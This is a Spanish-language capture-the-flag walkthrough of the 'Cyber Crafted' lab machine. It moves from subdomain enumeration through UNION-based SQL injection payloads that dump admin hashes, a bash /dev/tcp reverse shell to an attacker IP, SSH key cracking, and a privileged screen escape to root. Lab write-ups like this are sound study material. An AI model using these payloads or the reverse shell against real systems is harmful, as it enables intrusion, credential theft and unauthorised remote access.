Cyber Crafted

En esta maquina vamos a realizar explotacion de un servicio web en la cual debnemos enumerar los sundominios, es tos subdominios encontraremos un panel donde es vulnerable a sql injection para encontrar credenciales validas. Para la escalada de privilegios haremos uso de credenciales que encontraremos enumerando el sistema para luego explotar un binario que tenemos permisos privilegiados.

20231121025549.png

Walkthrough


Enumeración

Empezamos a enumerar los puertos que estan abiertos de la maquina victima

Teniendo conocimiento cada uno de los puertos abiertos, pasamos a enumerar cada uno de los servicios y versiones de estos puertos

Los puertos que encotramos son: 22, 80 y 25565

Puerto 80

Enumerando el puerto 80 tendremos que nos redirige a un dominio. Dominio que agregaremos en el /etc/hosts

Visitando el sitio web encontraremos el siguiente contenido

20231121025926.png

Enumerando de manera visual, no encontramos nada. Realizaremos una enumeración de los directorios del sitio web haciendo uso de ffuf, pero no encontramos nada interesante asi que procedi a enumerar subdominios

Fuzzing

20231121110153.png

Enumerando los subdominio encontré tres :

En admin.cybercrafted.thm encontraremos un panel de login que no se puede hacer mucho.

20231121110801.png

Viendo el contenido de cada uno de los otros subdominios no se encontró mucho, por lo que pasamos a enumerar los directorios. En el subdominio que si encontramos algo interesante es: store.cybercrafted.thm

20231121154515.png

Explotación

SQL injection

store.cybercrafted.thm/search.php Encont!ramos un panel de busqueda de items, que hace una consulta a una base de datos. 20231121155647.pngarrow-up-right

Ingreseando seven' union select 1,2,3,4-- - podemos ver que el 2,3,4 nos muestra en la fila.

20231121165929.png

Procederemos a enumerar los nombres de las bases de datos seven' union select 1,schema_name,3,4 from information_schema.schemata--

20231121170009.png

Nos encontramos con las siguientes bases de datos:

La que nos parece interesante es webapp, por lo que enumeraremos las tablas que contiene esta base de datos.

20231121170329.png

La base de datos webapp contiene dos tablas que son admin y stock

Continuamos con la enumeración de la base de datos, en esta enumeraremos las columnas que contiene la tabla.

20231121170720.png

Tenemos las columnas de id, user y hash. Conociendo estos datos realizaremos una consulta a la tabla con los siguiente: seven' union select 1,id,user,hash from webapp.admin-- -

20231121171125.png

Cracking de hashes

Nos encontramos con credenciales que parecen estar encriptadas, así que procederemos a crackearlas con Crackstationarrow-up-right. Existen varias herramientas que te pueden ayudar a crackear, asi que sientete libre de usar la que se te hace mas comoda

20231121171421.png

Usaremos estas credenciales para ingresar al panel de login que vimos al inicio que se encuentra en : http://admin.cybercrafted.thm/

Ejecución de comandos

Podemos ejecutar comandos. Ahora lo que haremos será enviarnos una revershell para obtener una consola de la maquina victima.

20231121171738.png

Ingresamos el siguiente comando: bash -c 'exec bash -i &>/dev/tcp/[IP-ATTACKER]/443 <&1' en mi caso es lo que mayormente suelo usar, tu puedes usar otro si gustas

Escalada de privilegios

Usuario www-data

Una vez obtenida la shell como el usuario www-data

20231121174025.png

Enumerando encontraremos un archivo id_rsa que tenemos permisos para leerlo

20231121174349.png

Con este archivo podemos ingresar por ssh sin proporcionar credenciales, pero antes tenemos que crackearla debido a que esta protegida por contraseña

  1. Generamos el hash con ssh2john

  1. Crackeamos con john

  1. Cambiamos los permisos de archivo ìd_rsa

  1. Ejecutamos

  1. Ingresamos la contraseña y podemos ingresar como el usuario xxultimatecreeperxx

Usuario - xxultimatecreeperxx

20231121175040.png Enumerando las ta20231121175040.pngreas que se ejecutan en el sistema, podemos observar una, de esto nos interesa la ruta donde se se realizando el comprimido

20231121175614.png

Antes de ir al directorio vemos que pertenecemos a un grupo llamando minecraft

Por lo que tenemos permisos para ingresar a la directorio y poder leer cada uno de los archivos.

20231121190307.png

En especial uno que nos llama la atención que es log.txt en donde encontraremos unas credenciales que permitirán iniciar sesión como el usuario cybercrafted

20231121190426.png
20231121190531.png

Usuario - cybercrafted

Teniendo credenciales validad para este usuario, procedemos a enumerar y podemos ver que el usuario puede ejecutar /usr/bin/screen -r cybercrafted de manera privilegiada

20231121191915.png

Por lo que ejecutamos

20231121191813.png

Ahora para escapar precionamos las teclas ctrl + A y luego ctrl+ C

Usuario - root

20231121191953.png

¡VAMOS!

Happy hacking :)

Last updated